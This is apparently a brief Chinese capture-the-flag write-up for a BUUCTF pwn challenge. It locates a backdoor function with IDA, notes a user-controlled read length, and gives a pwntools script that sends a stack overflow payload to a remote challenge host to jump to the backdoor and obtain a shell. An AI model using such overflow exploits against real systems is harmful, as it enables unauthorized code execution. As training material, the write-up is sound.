例行检查,64位,开启NX保护
运行一下,
用IDA打开,检索字符串,看到了后门
跟进查看。
找到了地址,shelladdr=0x4006EA
查看主函数
接收函数长度由我们自己决定,由此可以造成溢出。
from pwn import*
r=remote('node3.buuoj.cn',25232)
shelladdr=0x4006EA
r.sendline('100')
payload='a'*(0x10+8)+p64(shelladdr)
r.sendline(payload)
r.interactive()